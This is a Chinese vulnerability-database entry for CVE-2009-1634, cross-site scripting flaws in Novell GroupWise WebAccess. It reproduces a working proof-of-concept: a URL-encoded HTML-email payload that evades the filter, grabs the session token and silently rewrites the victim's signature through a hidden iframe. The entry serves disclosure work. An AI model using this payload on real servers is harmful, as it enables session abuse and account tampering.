Novell GroupWise WebAccess gw/webacc多个跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117812 漏洞类型 其他
发布时间 2009-05-21 更新时间 2009-06-09
CVE编号 CVE-2009-1634 CNNVD-ID CNNVD-200905-360
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/33007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-360
|漏洞详情
NovellGroupWise是美国Novell公司的一套协作通讯系统。该系统提供了电子邮件、日程安排、即时通讯、任务管理、文档管理以及联系人管理等协作通讯服务。GroupwiseWebAccess的登录页面(https://www.website.com/gw/webacc)没有正确地验证用户在登陆请求中所提交的GWAP.version、User.Theme.index、User.lang等字段,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/35066/info

Novell GroupWise WebAccess is prone to multiple security vulnerabilities.

An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.

Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.

Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.

Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email
is open.
The first stage of this script extracts the session token (User.Context) from within the current
document's URI and used
to make up the second stage.
The second injects an iframe in the current page which in turn calls the signature configuration
interface and changes the user's signature on the fly.
This example uses a fake target, 'gwwa.victim.com' that must be changed with a real server
addresss/name.
Here, the security parser won't recognize "onload = 'javascript:..." as potentially unsafe just
because of the space characters.

<!--
    <html>
    <head>
    </head>
        <body onmouseover = 'return false;' onload = 'javascript:var
context=document.location.href;var token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
        var
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
        var
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
        document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;'>
            <br/>
            <br/><br/>Now check your signature ...
        </body>
    </html>
-->
|参考资料

来源:MISC
链接:https://bugzilla.novell.com/show_bug.cgi?id=472979
来源:XF
名称:groupwise-session-unauth-access(50688)
链接:http://xforce.iss.net/xforce/xfdb/50688
来源:VUPEN
名称:ADV-2009-1393
链接:http://www.vupen.com/english/advisories/2009/1393
来源:BID
名称:35066
链接:http://www.securityfocus.com/bid/35066
来源:www.novell.com
链接:http://www.novell.com/support/viewContent.do?externalId=7003266&sliceId=1
来源:SECUNIA
名称:35177
链接:http://secunia.com/advisories/35177